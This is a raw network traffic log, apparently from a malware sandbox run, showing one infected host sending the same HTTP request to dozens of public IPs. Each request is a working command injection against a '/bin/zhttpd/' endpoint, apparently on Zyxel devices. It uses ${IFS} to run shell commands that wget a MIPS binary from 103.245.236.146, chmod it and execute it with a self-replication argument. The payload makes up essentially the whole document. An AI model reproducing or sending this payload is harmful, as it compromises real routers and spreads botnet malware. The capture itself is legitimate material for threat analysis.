                                                Jan 28, 2024 10:16:30.895114899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5862192.168.2.2347394157.223.35.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895148993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5863192.168.2.2355488196.81.156.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895172119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5864192.168.2.2342328131.73.157.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895215988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5865192.168.2.2351264216.129.93.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895226955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5866192.168.2.2356030200.237.65.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895250082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5867192.168.2.234251852.63.126.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895314932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5868192.168.2.2350514206.112.178.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895323038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5869192.168.2.2339404152.169.240.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895344973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5870192.168.2.2348538193.129.38.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895382881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5871192.168.2.235926013.244.75.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895420074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5872192.168.2.2354334203.10.21.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895448923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5873192.168.2.2335314122.52.42.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895459890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5874192.168.2.2352056119.199.193.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895493031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5875192.168.2.2344706173.35.220.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895517111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5876192.168.2.234368038.108.65.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895531893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5877192.168.2.234472847.35.21.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895536900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5878192.168.2.235255423.59.154.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895572901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5879192.168.2.2352930188.61.242.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895591021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5880192.168.2.2334032180.80.196.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895612955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5881192.168.2.2357688168.241.39.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895638943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5882192.168.2.2357552216.81.43.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895668983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5883192.168.2.235085870.5.67.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895699978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5884192.168.2.2342968172.215.137.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895744085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5885192.168.2.2334716170.221.193.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895759106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5886192.168.2.234110044.20.245.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895802975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5887192.168.2.2336956122.108.205.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895828009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5888192.168.2.2349752113.94.178.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895853043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5889192.168.2.2348198220.196.16.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895853043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5890192.168.2.2360144148.211.57.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895914078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5891192.168.2.235419080.141.95.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895936966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5892192.168.2.233800023.63.36.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895960093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5893192.168.2.2341260103.79.59.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895979881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5894192.168.2.2355370157.12.7.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896035910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5895192.168.2.2352572206.168.201.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896035910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5896192.168.2.235162877.243.189.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896056890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5897192.168.2.2347716128.95.228.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896100998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5898192.168.2.234312278.72.76.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896131992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5899192.168.2.234570612.168.4.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896155119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5900192.168.2.2341790151.197.131.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896178961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5901192.168.2.235913866.216.131.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896214008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5902192.168.2.233804893.125.142.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896254063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5903192.168.2.2337524173.41.159.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896277905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5904192.168.2.2350896222.34.247.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896289110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5905192.168.2.2339442151.174.67.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896318913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5906192.168.2.2333876184.22.93.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896344900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5907192.168.2.2343480140.248.190.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896368027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5908192.168.2.233451292.79.9.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896389961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5909192.168.2.234636883.213.179.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896416903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5910192.168.2.235435283.41.8.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896441936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5911192.168.2.2348812211.114.137.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896467924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5912192.168.2.2337058113.240.216.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896476030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5913192.168.2.234435076.23.198.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896500111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5914192.168.2.2339702165.242.15.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896531105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5915192.168.2.235449449.102.35.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896585941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5916192.168.2.2333848217.195.191.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896604061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5917192.168.2.2345234117.229.155.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896616936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5918192.168.2.235561039.10.12.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896662951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5919192.168.2.2339818118.45.149.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896687984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5920192.168.2.2335468176.14.104.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896693945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5921192.168.2.235628067.162.138.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896742105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5922192.168.2.2360856158.65.210.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.896778107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5923192.168.2.233279224.59.187.243443
                                                TimestampBytes transferredDirectionData
